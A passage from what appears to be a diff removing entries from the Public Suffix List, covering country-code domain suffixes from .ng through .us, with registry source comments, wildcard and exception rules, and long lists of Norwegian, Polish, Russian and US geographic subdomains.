-store.nf - -// ng : http://psg.com/dns/ng/ -// Submitted by registry 2008-06-17 -ac.ng -com.ng -edu.ng -gov.ng -net.ng -org.ng - -// ni : http://www.nic.ni/dominios.htm -*.ni - -// nl : http://www.domain-registry.nl/ace.php/c,728,122,,,,Home.html -// Confirmed by registry (with technical -// reservations) 2008-06-08 -nl - -// BV.nl will be a registry for dutch BV's (besloten vennootschap) -bv.nl - -// the co.nl domain is managed by CoDNS B.V. Added 2010-05-23. -co.nl - -// no : http://www.norid.no/regelverk/index.en.html -// The Norwegian registry has declined to notify us of updates. The web pages -// referenced below are the official source of the data. There is also an -// announce mailing list: -// https://postlister.uninett.no/sympa/info/norid-diskusjon -no -// Norid generic domains : http://www.norid.no/regelverk/vedlegg-c.en.html -fhs.no -vgs.no -fylkesbibl.no -folkebibl.no -museum.no -idrett.no -priv.no -// Non-Norid generic domains : http://www.norid.no/regelverk/vedlegg-d.en.html -mil.no -stat.no -dep.no -kommune.no -herad.no -// no geographical names : http://www.norid.no/regelverk/vedlegg-b.en.html -// counties -aa.no -ah.no -bu.no -fm.no -hl.no -hm.no -jan-mayen.no -mr.no -nl.no -nt.no -of.no -ol.no -oslo.no -rl.no -sf.no -st.no -svalbard.no -tm.no -tr.no -va.no -vf.no -// primary and lower secondary schools per county -gs.aa.no -gs.ah.no -gs.bu.no -gs.fm.no -gs.hl.no -gs.hm.no -gs.jan-mayen.no -gs.mr.no -gs.nl.no -gs.nt.no -gs.of.no -gs.ol.no -gs.oslo.no -gs.rl.no -gs.sf.no -gs.st.no -gs.svalbard.no -gs.tm.no -gs.tr.no -gs.va.no -gs.vf.no -// cities -akrehamn.no -åkrehamn.no -algard.no -ålgård.no -arna.no -brumunddal.no -bryne.no -bronnoysund.no -brønnøysund.no -drobak.no -drøbak.no -egersund.no -fetsund.no -floro.no -florø.no -fredrikstad.no -hokksund.no -honefoss.no -hønefoss.no -jessheim.no -jorpeland.no -jørpeland.no -kirkenes.no -kopervik.no -krokstadelva.no -langevag.no -langevåg.no -leirvik.no -mjondalen.no -mjøndalen.no -mo-i-rana.no -mosjoen.no -mosjøen.no -nesoddtangen.no -orkanger.no -osoyro.no -osøyro.no -raholt.no -råholt.no -sandnessjoen.no -sandnessjøen.no -skedsmokorset.no -slattum.no -spjelkavik.no -stathelle.no -stavern.no -stjordalshalsen.no -stjørdalshalsen.no -tananger.no -tranby.no -vossevangen.no -// communities -afjord.no -åfjord.no -agdenes.no -al.no -ål.no -alesund.no -ålesund.no -alstahaug.no -alta.no -áltá.no -alaheadju.no -álaheadju.no -alvdal.no -amli.no -åmli.no -amot.no -åmot.no -andebu.no -andoy.no -andøy.no -andasuolo.no -ardal.no -årdal.no -aremark.no -arendal.no -ås.no -aseral.no -åseral.no -asker.no -askim.no -askvoll.no -askoy.no -askøy.no -asnes.no -åsnes.no -audnedaln.no -aukra.no -aure.no -aurland.no -aurskog-holand.no -aurskog-høland.no -austevoll.no -austrheim.no -averoy.no -averøy.no -balestrand.no -ballangen.no -balat.no -bálát.no -balsfjord.no -bahccavuotna.no -báhccavuotna.no -bamble.no -bardu.no -beardu.no -beiarn.no -bajddar.no -bájddar.no -baidar.no -báidár.no -berg.no -bergen.no -berlevag.no -berlevåg.no -bearalvahki.no -bearalváhki.no -bindal.no -birkenes.no -bjarkoy.no -bjarkøy.no -bjerkreim.no -bjugn.no -bodo.no -bodø.no -badaddja.no -bådåddjå.no -budejju.no -bokn.no -bremanger.no -bronnoy.no -brønnøy.no -bygland.no -bykle.no -barum.no -bærum.no -bo.telemark.no -bø.telemark.no -bo.nordland.no -bø.nordland.no -bievat.no -bievát.no -bomlo.no -bømlo.no -batsfjord.no -båtsfjord.no -bahcavuotna.no -báhcavuotna.no -dovre.no -drammen.no -drangedal.no -dyroy.no -dyrøy.no -donna.no -dønna.no -eid.no -eidfjord.no -eidsberg.no -eidskog.no -eidsvoll.no -eigersund.no -elverum.no -enebakk.no -engerdal.no -etne.no -etnedal.no -evenes.no -evenassi.no -evenášši.no -evje-og-hornnes.no -farsund.no -fauske.no -fuossko.no -fuoisku.no -fedje.no -fet.no -finnoy.no -finnøy.no -fitjar.no -fjaler.no -fjell.no -flakstad.no -flatanger.no -flekkefjord.no -flesberg.no -flora.no -fla.no -flå.no -folldal.no -forsand.no -fosnes.no -frei.no -frogn.no -froland.no -frosta.no -frana.no -fræna.no -froya.no -frøya.no -fusa.no -fyresdal.no -forde.no -førde.no -gamvik.no -gangaviika.no -gáŋgaviika.no -gaular.no -gausdal.no -gildeskal.no -gildeskål.no -giske.no -gjemnes.no -gjerdrum.no -gjerstad.no -gjesdal.no -gjovik.no -gjøvik.no -gloppen.no -gol.no -gran.no -grane.no -granvin.no -gratangen.no -grimstad.no -grong.no -kraanghke.no -kråanghke.no -grue.no -gulen.no -hadsel.no -halden.no -halsa.no -hamar.no -hamaroy.no -habmer.no -hábmer.no -hapmir.no -hápmir.no -hammerfest.no -hammarfeasta.no -hámmárfeasta.no -haram.no -hareid.no -harstad.no -hasvik.no -aknoluokta.no -ákŋoluokta.no -hattfjelldal.no -aarborte.no -haugesund.no -hemne.no -hemnes.no -hemsedal.no -heroy.more-og-romsdal.no -herøy.møre-og-romsdal.no -heroy.nordland.no -herøy.nordland.no -hitra.no -hjartdal.no -hjelmeland.no -hobol.no -hobøl.no -hof.no -hol.no -hole.no -holmestrand.no -holtalen.no -holtålen.no -hornindal.no -horten.no -hurdal.no -hurum.no -hvaler.no -hyllestad.no -hagebostad.no -hægebostad.no -hoyanger.no -høyanger.no -hoylandet.no -høylandet.no -ha.no -hå.no -ibestad.no -inderoy.no -inderøy.no -iveland.no -jevnaker.no -jondal.no -jolster.no -jølster.no -karasjok.no -karasjohka.no -kárášjohka.no -karlsoy.no -galsa.no -gálsá.no -karmoy.no -karmøy.no -kautokeino.no -guovdageaidnu.no -klepp.no -klabu.no -klæbu.no -kongsberg.no -kongsvinger.no -kragero.no -kragerø.no -kristiansand.no -kristiansund.no -krodsherad.no -krødsherad.no -kvalsund.no -rahkkeravju.no -ráhkkerávju.no -kvam.no -kvinesdal.no -kvinnherad.no -kviteseid.no -kvitsoy.no -kvitsøy.no -kvafjord.no -kvæfjord.no -giehtavuoatna.no -kvanangen.no -kvænangen.no -navuotna.no -návuotna.no -kafjord.no -kåfjord.no -gaivuotna.no -gáivuotna.no -larvik.no -lavangen.no -lavagis.no -loabat.no -loabát.no -lebesby.no -davvesiida.no -leikanger.no -leirfjord.no -leka.no -leksvik.no -lenvik.no -leangaviika.no -leaŋgaviika.no -lesja.no -levanger.no -lier.no -lierne.no -lillehammer.no -lillesand.no -lindesnes.no -lindas.no -lindås.no -lom.no -loppa.no -lahppi.no -láhppi.no -lund.no -lunner.no -luroy.no -lurøy.no -luster.no -lyngdal.no -lyngen.no -ivgu.no -lardal.no -lerdal.no -lærdal.no -lodingen.no -lødingen.no -lorenskog.no -lørenskog.no -loten.no -løten.no -malvik.no -masoy.no -måsøy.no -muosat.no -muosát.no -mandal.no -marker.no -marnardal.no -masfjorden.no -meland.no -meldal.no -melhus.no -meloy.no -meløy.no -meraker.no -meråker.no -moareke.no -moåreke.no -midsund.no -midtre-gauldal.no -modalen.no -modum.no -molde.no -moskenes.no -moss.no -mosvik.no -malselv.no -målselv.no -malatvuopmi.no -málatvuopmi.no -namdalseid.no -aejrie.no -namsos.no -namsskogan.no -naamesjevuemie.no -nååmesjevuemie.no -laakesvuemie.no -nannestad.no -narvik.no -narviika.no -naustdal.no -nedre-eiker.no -nes.akershus.no -nes.buskerud.no -nesna.no -nesodden.no -nesseby.no -unjarga.no -unjárga.no -nesset.no -nissedal.no -nittedal.no -nord-aurdal.no -nord-fron.no -nord-odal.no -norddal.no -nordkapp.no -davvenjarga.no -davvenjárga.no -nordre-land.no -nordreisa.no -raisa.no -ráisa.no -nore-og-uvdal.no -notodden.no -naroy.no -nærøy.no -notteroy.no -nøtterøy.no -odda.no -oksnes.no -øksnes.no -oppdal.no -oppegard.no -oppegård.no -orkdal.no -orland.no -ørland.no -orskog.no -ørskog.no -orsta.no -ørsta.no -os.hedmark.no -os.hordaland.no -osen.no -osteroy.no -osterøy.no -ostre-toten.no -østre-toten.no -overhalla.no -ovre-eiker.no -øvre-eiker.no -oyer.no -øyer.no -oygarden.no -øygarden.no -oystre-slidre.no -øystre-slidre.no -porsanger.no -porsangu.no -porsáŋgu.no -porsgrunn.no -radoy.no -radøy.no -rakkestad.no -rana.no -ruovat.no -randaberg.no -rauma.no -rendalen.no -rennebu.no -rennesoy.no -rennesøy.no -rindal.no -ringebu.no -ringerike.no -ringsaker.no -rissa.no -risor.no -risør.no -roan.no -rollag.no -rygge.no -ralingen.no -rælingen.no -rodoy.no -rødøy.no -romskog.no -rømskog.no -roros.no -røros.no -rost.no -røst.no -royken.no -røyken.no -royrvik.no -røyrvik.no -rade.no -råde.no -salangen.no -siellak.no -saltdal.no -salat.no -sálát.no -sálat.no -samnanger.no -sande.more-og-romsdal.no -sande.møre-og-romsdal.no -sande.vestfold.no -sandefjord.no -sandnes.no -sandoy.no -sandøy.no -sarpsborg.no -sauda.no -sauherad.no -sel.no -selbu.no -selje.no -seljord.no -sigdal.no -siljan.no -sirdal.no -skaun.no -skedsmo.no -ski.no -skien.no -skiptvet.no -skjervoy.no -skjervøy.no -skierva.no -skiervá.no -skjak.no -skjåk.no -skodje.no -skanland.no -skånland.no -skanit.no -skánit.no -smola.no -smøla.no -snillfjord.no -snasa.no -snåsa.no -snoasa.no -snaase.no -snåase.no -sogndal.no -sokndal.no -sola.no -solund.no -songdalen.no -sortland.no -spydeberg.no -stange.no -stavanger.no -steigen.no -steinkjer.no -stjordal.no -stjørdal.no -stokke.no -stor-elvdal.no -stord.no -stordal.no -storfjord.no -omasvuotna.no -strand.no -stranda.no -stryn.no -sula.no -suldal.no -sund.no -sunndal.no -surnadal.no -sveio.no -svelvik.no -sykkylven.no -sogne.no -søgne.no -somna.no -sømna.no -sondre-land.no -søndre-land.no -sor-aurdal.no -sør-aurdal.no -sor-fron.no -sør-fron.no -sor-odal.no -sør-odal.no -sor-varanger.no -sør-varanger.no -matta-varjjat.no -mátta-várjjat.no -sorfold.no -sørfold.no -sorreisa.no -sørreisa.no -sorum.no -sørum.no -tana.no -deatnu.no -time.no -tingvoll.no -tinn.no -tjeldsund.no -dielddanuorri.no -tjome.no -tjøme.no -tokke.no -tolga.no -torsken.no -tranoy.no -tranøy.no -tromso.no -tromsø.no -tromsa.no -romsa.no -trondheim.no -troandin.no -trysil.no -trana.no -træna.no -trogstad.no -trøgstad.no -tvedestrand.no -tydal.no -tynset.no -tysfjord.no -divtasvuodna.no -divttasvuotna.no -tysnes.no -tysvar.no -tysvær.no -tonsberg.no -tønsberg.no -ullensaker.no -ullensvang.no -ulvik.no -utsira.no -vadso.no -vadsø.no -cahcesuolo.no -čáhcesuolo.no -vaksdal.no -valle.no -vang.no -vanylven.no -vardo.no -vardø.no -varggat.no -várggát.no -vefsn.no -vaapste.no -vega.no -vegarshei.no -vegårshei.no -vennesla.no -verdal.no -verran.no -vestby.no -vestnes.no -vestre-slidre.no -vestre-toten.no -vestvagoy.no -vestvågøy.no -vevelstad.no -vik.no -vikna.no -vindafjord.no -volda.no -voss.no -varoy.no -værøy.no -vagan.no -vågan.no -voagat.no -vagsoy.no -vågsøy.no -vaga.no -vågå.no -valer.ostfold.no -våler.østfold.no -valer.hedmark.no -våler.hedmark.no - -// the co.no domain is managed by CoDNS B.V. Added 2010-05-23. -co.no - -// np : http://www.mos.com.np/register.html -*.np - -// nr : http://cenpac.net.nr/dns/index.html -// Confirmed by registry 2008-06-17 -nr -biz.nr -info.nr -gov.nr -edu.nr -org.nr -net.nr -com.nr - -// nu : http://en.wikipedia.org/wiki/.nu -nu - -// nz : http://en.wikipedia.org/wiki/.nz -*.nz - -// om : http://en.wikipedia.org/wiki/.om -*.om -!mediaphone.om -!nawrastelecom.om -!nawras.om -!omanmobile.om -!omanpost.om -!omantel.om -!rakpetroleum.om -!siemens.om -!songfest.om -!statecouncil.om - -// org : http://en.wikipedia.org/wiki/.org -org - -// CentralNic names : http://www.centralnic.com/names/domains -// Submitted by registry 2008-06-17 -ae.org - -// ZaNiC names : http://www.za.net/ -// Confirmed by registry 2009-10-03 -za.org - -// pa : http://www.nic.pa/ -// Some additional second level "domains" resolve directly as hostnames, such as -// pannet.pa, so we add a rule for "pa". -pa -ac.pa -gob.pa -com.pa -org.pa -sld.pa -edu.pa -net.pa -ing.pa -abo.pa -med.pa -nom.pa - -// pe : https://www.nic.pe/InformeFinalComision.pdf -pe -edu.pe -gob.pe -nom.pe -mil.pe -org.pe -com.pe -net.pe - -// pf : http://www.gobin.info/domainname/formulaire-pf.pdf -pf -com.pf -org.pf -edu.pf - -// pg : http://en.wikipedia.org/wiki/.pg -*.pg - -// ph : http://www.domains.ph/FAQ2.asp -// Submitted by registry 2008-06-13 -ph -com.ph -net.ph -org.ph -gov.ph -edu.ph -ngo.ph -mil.ph -i.ph - -// pk : http://pk5.pknic.net.pk/pk5/msgNamepk.PK -pk -com.pk -net.pk -edu.pk -org.pk -fam.pk -biz.pk -web.pk -gov.pk -gob.pk -gok.pk -gon.pk -gop.pk -gos.pk -info.pk - -// pl : http://www.dns.pl/english/ -pl -// NASK functional domains (nask.pl / dns.pl) : http://www.dns.pl/english/dns-funk.html -aid.pl -agro.pl -atm.pl -auto.pl -biz.pl -com.pl -edu.pl -gmina.pl -gsm.pl -info.pl -mail.pl -miasta.pl -media.pl -mil.pl -net.pl -nieruchomosci.pl -nom.pl -org.pl -pc.pl -powiat.pl -priv.pl -realestate.pl -rel.pl -sex.pl -shop.pl -sklep.pl -sos.pl -szkola.pl -targi.pl -tm.pl -tourism.pl -travel.pl -turystyka.pl -// ICM functional domains (icm.edu.pl) -6bone.pl -art.pl -mbone.pl -// Government domains (administred by ippt.gov.pl) -gov.pl -uw.gov.pl -um.gov.pl -ug.gov.pl -upow.gov.pl -starostwo.gov.pl -so.gov.pl -sr.gov.pl -po.gov.pl -pa.gov.pl -// other functional domains -ngo.pl -irc.pl -usenet.pl -// NASK geographical domains : http://www.dns.pl/english/dns-regiony.html -augustow.pl -babia-gora.pl -bedzin.pl -beskidy.pl -bialowieza.pl -bialystok.pl -bielawa.pl -bieszczady.pl -boleslawiec.pl -bydgoszcz.pl -bytom.pl -cieszyn.pl -czeladz.pl -czest.pl -dlugoleka.pl -elblag.pl -elk.pl -glogow.pl -gniezno.pl -gorlice.pl -grajewo.pl -ilawa.pl -jaworzno.pl -jelenia-gora.pl -jgora.pl -kalisz.pl -kazimierz-dolny.pl -karpacz.pl -kartuzy.pl -kaszuby.pl -katowice.pl -kepno.pl -ketrzyn.pl -klodzko.pl -kobierzyce.pl -kolobrzeg.pl -konin.pl -konskowola.pl -kutno.pl -lapy.pl -lebork.pl -legnica.pl -lezajsk.pl -limanowa.pl -lomza.pl -lowicz.pl -lubin.pl -lukow.pl -malbork.pl -malopolska.pl -mazowsze.pl -mazury.pl -mielec.pl -mielno.pl -mragowo.pl -naklo.pl -nowaruda.pl -nysa.pl -olawa.pl -olecko.pl -olkusz.pl -olsztyn.pl -opoczno.pl -opole.pl -ostroda.pl -ostroleka.pl -ostrowiec.pl -ostrowwlkp.pl -pila.pl -pisz.pl -podhale.pl -podlasie.pl -polkowice.pl -pomorze.pl -pomorskie.pl -prochowice.pl -pruszkow.pl -przeworsk.pl -pulawy.pl -radom.pl -rawa-maz.pl -rybnik.pl -rzeszow.pl -sanok.pl -sejny.pl -siedlce.pl -slask.pl -slupsk.pl -sosnowiec.pl -stalowa-wola.pl -skoczow.pl -starachowice.pl -stargard.pl -suwalki.pl -swidnica.pl -swiebodzin.pl -swinoujscie.pl -szczecin.pl -szczytno.pl -tarnobrzeg.pl -tgory.pl -turek.pl -tychy.pl -ustka.pl -walbrzych.pl -warmia.pl -warszawa.pl -waw.pl -wegrow.pl -wielun.pl -wlocl.pl -wloclawek.pl -wodzislaw.pl -wolomin.pl -wroclaw.pl -zachpomor.pl -zagan.pl -zarow.pl -zgora.pl -zgorzelec.pl -// TASK geographical domains (www.task.gda.pl/uslugi/dns) -gda.pl -gdansk.pl -gdynia.pl -med.pl -sopot.pl -// other geographical domains -gliwice.pl -krakow.pl -poznan.pl -wroc.pl -zakopane.pl - -// co.pl : Mainseek Sp. z o.o. http://www.co.pl -co.pl - -// pn : http://www.government.pn/PnRegistry/policies.htm -pn -gov.pn -co.pn -org.pn -edu.pn -net.pn - -// pr : http://www.nic.pr/index.asp?f=1 -pr -com.pr -net.pr -org.pr -gov.pr -edu.pr -isla.pr -pro.pr -biz.pr -info.pr -name.pr -// these aren't mentioned on nic.pr, but on http://en.wikipedia.org/wiki/.pr -est.pr -prof.pr -ac.pr - -// pro : http://www.nic.pro/support_faq.htm -pro -aca.pro -bar.pro -cpa.pro -jur.pro -law.pro -med.pro -eng.pro - -// ps : http://en.wikipedia.org/wiki/.ps -// http://www.nic.ps/registration/policy.html#reg -ps -edu.ps -gov.ps -sec.ps -plo.ps -com.ps -org.ps -net.ps - -// pt : http://online.dns.pt/dns/start_dns -pt -net.pt -gov.pt -org.pt -edu.pt -int.pt -publ.pt -com.pt -nome.pt - -// pw : http://en.wikipedia.org/wiki/.pw -pw -co.pw -ne.pw -or.pw -ed.pw -go.pw -belau.pw - -// py : http://www.nic.py/faq_a.html#faq_b -*.py - -// qa : http://www.qatar.net.qa/services/virtual.htm -*.qa - -// re : http://www.afnic.re/obtenir/chartes/nommage-re/annexe-descriptifs -re -com.re -asso.re -nom.re - -// ro : http://www.rotld.ro/ -ro -com.ro -org.ro -tm.ro -nt.ro -nom.ro -info.ro -rec.ro -arts.ro -firm.ro -store.ro -www.ro - -// rs : http://en.wikipedia.org/wiki/.rs -rs -co.rs -org.rs -edu.rs -ac.rs -gov.rs -in.rs - -// ru : http://www.cctld.ru/ru/docs/aktiv_8.php -// Industry domains -ru -ac.ru -com.ru -edu.ru -int.ru -net.ru -org.ru -pp.ru -// Geographical domains -adygeya.ru -altai.ru -amur.ru -arkhangelsk.ru -astrakhan.ru -bashkiria.ru -belgorod.ru -bir.ru -bryansk.ru -buryatia.ru -cbg.ru -chel.ru -chelyabinsk.ru -chita.ru -chukotka.ru -chuvashia.ru -dagestan.ru -dudinka.ru -e-burg.ru -grozny.ru -irkutsk.ru -ivanovo.ru -izhevsk.ru -jar.ru -joshkar-ola.ru -kalmykia.ru -kaluga.ru -kamchatka.ru -karelia.ru -kazan.ru -kchr.ru -kemerovo.ru -khabarovsk.ru -khakassia.ru -khv.ru -kirov.ru -koenig.ru -komi.ru -kostroma.ru -krasnoyarsk.ru -kuban.ru -kurgan.ru -kursk.ru -lipetsk.ru -magadan.ru -mari.ru -mari-el.ru -marine.ru -mordovia.ru -mosreg.ru -msk.ru -murmansk.ru -nalchik.ru -nnov.ru -nov.ru -novosibirsk.ru -nsk.ru -omsk.ru -orenburg.ru -oryol.ru -palana.ru -penza.ru -perm.ru -pskov.ru -ptz.ru -rnd.ru -ryazan.ru -sakhalin.ru -samara.ru -saratov.ru -simbirsk.ru -smolensk.ru -spb.ru -stavropol.ru -stv.ru -surgut.ru -tambov.ru -tatarstan.ru -tom.ru -tomsk.ru -tsaritsyn.ru -tsk.ru -tula.ru -tuva.ru -tver.ru -tyumen.ru -udm.ru -udmurtia.ru -ulan-ude.ru -vladikavkaz.ru -vladimir.ru -vladivostok.ru -volgograd.ru -vologda.ru -voronezh.ru -vrn.ru -vyatka.ru -yakutia.ru -yamal.ru -yaroslavl.ru -yekaterinburg.ru -yuzhno-sakhalinsk.ru -// More geographical domains -amursk.ru -baikal.ru -cmw.ru -fareast.ru -jamal.ru -kms.ru -k-uralsk.ru -kustanai.ru -kuzbass.ru -magnitka.ru -mytis.ru -nakhodka.ru -nkz.ru -norilsk.ru -oskol.ru -pyatigorsk.ru -rubtsovsk.ru -snz.ru -syzran.ru -vdonsk.ru -zgrad.ru -// State domains -gov.ru -mil.ru -// Technical domains -test.ru - -// rw : http://www.nic.rw/cgi-bin/policy.pl -rw -gov.rw -net.rw -edu.rw -ac.rw -com.rw -co.rw -int.rw -mil.rw -gouv.rw - -// sa : http://www.nic.net.sa/ -sa -com.sa -net.sa -org.sa -gov.sa -med.sa -pub.sa -edu.sa -sch.sa - -// sb : http://www.sbnic.net.sb/ -// Submitted by registry 2008-06-08 -sb -com.sb -edu.sb -gov.sb -net.sb -org.sb - -// sc : http://www.nic.sc/ -sc -com.sc -gov.sc -net.sc -org.sc -edu.sc - -// sd : http://www.isoc.sd/sudanic.isoc.sd/billing_pricing.htm -// Submitted by registry 2008-06-17 -sd -com.sd -net.sd -org.sd -edu.sd -med.sd -gov.sd -info.sd - -// se : http://en.wikipedia.org/wiki/.se -// Submitted by registry 2008-06-24 -se -a.se -ac.se -b.se -bd.se -brand.se -c.se -d.se -e.se -f.se -fh.se -fhsk.se -fhv.se -g.se -h.se -i.se -k.se -komforb.se -kommunalforbund.se -komvux.se -l.se -lanbib.se -m.se -n.se -naturbruksgymn.se -o.se -org.se -p.se -parti.se -pp.se -press.se -r.se -s.se -sshn.se -t.se -tm.se -u.se -w.se -x.se -y.se -z.se - -// sg : http://www.nic.net.sg/sub_policies_agreement/2ld.html -sg -com.sg -net.sg -org.sg -gov.sg -edu.sg -per.sg - -// sh : http://www.nic.sh/rules.html -// list of 2nd level domains ? -sh - -// si : http://en.wikipedia.org/wiki/.si -si - -// sj : No registrations at this time. -// Submitted by registry 2008-06-16 - -// sk : http://en.wikipedia.org/wiki/.sk -// list of 2nd level domains ? -sk - -// sl : http://www.nic.sl -// Submitted by registry 2008-06-12 -sl -com.sl -net.sl -edu.sl -gov.sl -org.sl - -// sm : http://en.wikipedia.org/wiki/.sm -sm - -// sn : http://en.wikipedia.org/wiki/.sn -sn -art.sn -com.sn -edu.sn -gouv.sn -org.sn -perso.sn -univ.sn - -// so : http://www.soregistry.com/ -so -com.so -net.so -org.so - -// sr : http://en.wikipedia.org/wiki/.sr -sr - -// st : http://www.nic.st/html/policyrules/ -st -co.st -com.st -consulado.st -edu.st -embaixada.st -gov.st -mil.st -net.st -org.st -principe.st -saotome.st -store.st - -// su : http://en.wikipedia.org/wiki/.su -su - -// sv : http://www.svnet.org.sv/svpolicy.html -*.sv - -// sy : http://en.wikipedia.org/wiki/.sy -// see also: http://www.gobin.info/domainname/sy.doc -sy -edu.sy -gov.sy -net.sy -mil.sy -com.sy -org.sy - -// sz : http://en.wikipedia.org/wiki/.sz -// http://www.sispa.org.sz/ -sz -co.sz -ac.sz -org.sz - -// tc : http://en.wikipedia.org/wiki/.tc -tc - -// td : http://en.wikipedia.org/wiki/.td -td - -// tel: http://en.wikipedia.org/wiki/.tel -// http://www.telnic.org/ -tel - -// tf : http://en.wikipedia.org/wiki/.tf -tf - -// tg : http://en.wikipedia.org/wiki/.tg -// http://www.nic.tg/nictg/index.php implies no reserved 2nd-level domains, -// although this contradicts wikipedia. -tg - -// th : http://en.wikipedia.org/wiki/.th -// Submitted by registry 2008-06-17 -th -ac.th -co.th -go.th -in.th -mi.th -net.th -or.th - -// tj : http://www.nic.tj/policy.htm -tj -ac.tj -biz.tj -co.tj -com.tj -edu.tj -go.tj -gov.tj -int.tj -mil.tj -name.tj -net.tj -nic.tj -org.tj -test.tj -web.tj - -// tk : http://en.wikipedia.org/wiki/.tk -tk - -// tl : http://en.wikipedia.org/wiki/.tl -tl -gov.tl - -// tm : http://www.nic.tm/rules.html -// list of 2nd level tlds ? -tm - -// tn : http://en.wikipedia.org/wiki/.tn -// http://whois.ati.tn/ -tn -com.tn -ens.tn -fin.tn -gov.tn -ind.tn -intl.tn -nat.tn -net.tn -org.tn -info.tn -perso.tn -tourism.tn -edunet.tn -rnrt.tn -rns.tn -rnu.tn -mincom.tn -agrinet.tn -defense.tn -turen.tn - -// to : http://en.wikipedia.org/wiki/.to -// Submitted by registry 2008-06-17 -to -com.to -gov.to -net.to -org.to -edu.to -mil.to - -// tr : http://en.wikipedia.org/wiki/.tr -*.tr -!nic.tr -// Used by government in the TRNC -// http://en.wikipedia.org/wiki/.nc.tr -gov.nc.tr - -// travel : http://en.wikipedia.org/wiki/.travel -travel - -// tt : http://www.nic.tt/ -tt -co.tt -com.tt -org.tt -net.tt -biz.tt -info.tt -pro.tt -int.tt -coop.tt -jobs.tt -mobi.tt -travel.tt -museum.tt -aero.tt -name.tt -gov.tt -edu.tt - -// tv : http://en.wikipedia.org/wiki/.tv -// Not listing any 2LDs as reserved since none seem to exist in practice, -// Wikipedia notwithstanding. -tv - -// tw : http://en.wikipedia.org/wiki/.tw -tw -edu.tw -gov.tw -mil.tw -com.tw -net.tw -org.tw -idv.tw -game.tw -ebiz.tw -club.tw -網路.tw -組織.tw -商業.tw - -// tz : http://en.wikipedia.org/wiki/.tz -// Submitted by registry 2008-06-17 -// Updated from http://www.tznic.or.tz/index.php/domains.html 2010-10-25 -ac.tz -co.tz -go.tz -mil.tz -ne.tz -or.tz -sc.tz - -// ua : http://www.nic.net.ua/ -ua -com.ua -edu.ua -gov.ua -in.ua -net.ua -org.ua -// ua geo-names -cherkassy.ua -chernigov.ua -chernovtsy.ua -ck.ua -cn.ua -crimea.ua -cv.ua -dn.ua -dnepropetrovsk.ua -donetsk.ua -dp.ua -if.ua -ivano-frankivsk.ua -kh.ua -kharkov.ua -kherson.ua -khmelnitskiy.ua -kiev.ua -kirovograd.ua -km.ua -kr.ua -ks.ua -kv.ua -lg.ua -lugansk.ua -lutsk.ua -lviv.ua -mk.ua -nikolaev.ua -od.ua -odessa.ua -pl.ua -poltava.ua -rovno.ua -rv.ua -sebastopol.ua -sumy.ua -te.ua -ternopil.ua -uzhgorod.ua -vinnica.ua -vn.ua -zaporizhzhe.ua -zp.ua -zhitomir.ua -zt.ua - -// ug : http://www.registry.co.ug/ -ug -co.ug -ac.ug -sc.ug -go.ug -ne.ug -or.ug - -// uk : http://en.wikipedia.org/wiki/.uk -*.uk -*.sch.uk -!bl.uk -!british-library.uk -!icnet.uk -!gov.uk -!jet.uk -!mod.uk -!nel.uk -!nhs.uk -!nic.uk -!nls.uk -!national-library-scotland.uk -!parliament.uk -!police.uk - -// us : http://en.wikipedia.org/wiki/.us -us -dni.us -fed.us -isa.us -kids.us -nsn.us -// us geographic names -ak.us -al.us -ar.us -as.us -az.us -ca.us -co.us -ct.us -dc.us -de.us -fl.us -ga.us -gu.us -hi.us -ia.us -id.us -il.us -in.us -ks.us -ky.us -la.us -ma.us -md.us -me.us -mi.us -mn.us -mo.us -ms.us -mt.us -nc.us -nd.us -ne.us -nh.us -nj.us -nm.us -nv.us -ny.us -oh.us -ok.us -or.us -pa.us -pr.us -ri.us -sc.us -sd.us -tn.us -tx.us -ut.us -vi.us -vt.us -va.us -wa.us -wi.us -wv.us -wy.us -// The registrar notes several more specific domains available in each state, -// such as state.*.us, dst.*.us, etc., but resolution of these is somewhat -// haphazard; in some states these domains resolve as addresses, while in others -// only subdomains are available, or even nothing at all. We include the -// most common ones where it's clear that different sites are different -// entities. -k12.ak.us -k12.al.us -k12.ar.us -k12.as.us -k12.az.us -k12.ca.us -k12.co.us -k12.ct.us -k12.dc.us -k12.de.us -k12.fl.us -k12.ga.us -k12.gu.us -// k12.hi.us Hawaii has a state-wide DOE login: bug 614565 -k12.ia.us -k12.id.us -k12.il.us -k12.in.us -k12.ks.us -k12.ky.us -k12.la.us -k12.ma.us -k12.md.us -k12.me.us -k12.mi.us -k12.mn.us -k12.mo.us -k12.ms.us -k12.mt.us -k12.nc.us -k12.nd.us -k12.ne.us -k12.nh.us -k12.nj.us -k12.nm.us -k12.nv.us -k12.ny.us -k12.oh.us -k12.ok.us -k12.or.us -k12.pa.us -k12.pr.us -k12.ri.us -k12.sc.us -k12.sd.us -k12.tn.us -k12.tx.us -k12.ut.us -k12.vi.us -k12.vt.us -k12.va.us -k12.wa.us -k12.wi.us -k12.wv.us -k12.wy.us - -cc.ak.us -cc.al.us -cc.ar.us -cc.as.us -cc.az.us -cc.ca.us -cc.co.us -cc.ct.us -cc.dc.us -cc.de.us -cc.fl.us -cc.ga.us -cc.gu.us -cc.hi.us -cc.ia.us -cc.id.us -cc.il.us -cc.in.us -cc.ks.us -cc.ky.us -cc.la.us -cc.ma.us -cc.md.us -cc.me.us -cc.mi.us -cc.mn.us -cc.mo.us -cc.ms.us -cc.mt.us -cc.nc.us -cc.nd.us -cc.ne.us -cc.nh.us -cc.nj.us -cc.nm.us -cc.nv.us -cc.ny.us -cc.oh.us -cc.ok.us -cc.or.us -cc.pa.us -cc.pr.us -cc.ri.us -cc.sc.us -cc.sd.us -cc.tn.us -cc.tx.us -cc.ut.us -cc.vi.us -cc.vt.us -cc.va.us -cc.wa.us -cc.wi.us -cc.wv.us -cc.wy.us - -lib.ak.us -lib.al.us -lib.ar.us -lib.as.us -lib.az.us -lib.ca.us -lib.co.us -lib.ct.us -lib.dc.us -lib.de.us -lib.fl.us -lib.ga.us -lib.gu.us -lib.hi.us -lib.ia.us -lib.id.us -lib.il.us -lib.in.us -lib.ks.us -lib.ky.us -lib.la.us -lib.ma.us -lib.md.us -lib.me.us -lib.mi.us -lib.mn.us -lib.mo.us -lib.ms.us -lib.mt.us -lib.nc.us -lib.nd.us -lib.ne.us -lib.nh.us -lib.nj.us -lib.nm.us -lib.nv.us -lib.ny.us -lib.oh.us -lib.ok.us -lib.or.us -lib.pa.us -lib.pr.us -lib.ri.us -lib.sc.us -lib.sd.us -lib.tn.us -lib.tx.us -lib.ut.us -lib.vi.us -lib.vt.us -lib.va.us -lib.wa.us -lib.wi.us -lib.wv.us -lib.wy.us - -// k12.ma.us contains school districts in Massachusetts. The 4LDs are -// 